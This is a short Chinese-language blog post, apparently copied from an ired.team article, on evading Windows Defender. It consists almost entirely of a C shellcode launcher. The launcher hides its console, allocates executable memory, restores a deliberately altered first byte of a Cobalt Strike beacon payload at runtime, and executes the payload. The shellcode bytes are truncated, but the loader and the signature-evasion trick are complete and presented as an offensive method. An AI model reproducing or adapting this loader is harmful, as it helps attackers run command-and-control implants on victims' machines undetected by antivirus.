免杀-修改1 Byte绕过Windows Defender

修改1字节绕过Windows Defender

https://www.ired.team/offensive-security/defense-evasion/evading-windows-defender-using-classic-c-shellcode-launcher-with-1-byte-change

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#include "stdafx.h"
#include "Windows.h"

int main(int argc, char *argv[]) {
::ShowWindow(::GetConsoleWindow(), SW_HIDE);

// cobalt strike beacon shellcode x64
unsigned char shellcode[] = "\xfd\x48\...";
char first[] = "\xfc";
void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

memcpy(shellcode, first, 1);
memcpy(exec, shellcode, sizeof shellcode);
((void(*)())exec)();

return 0;
}

效果

1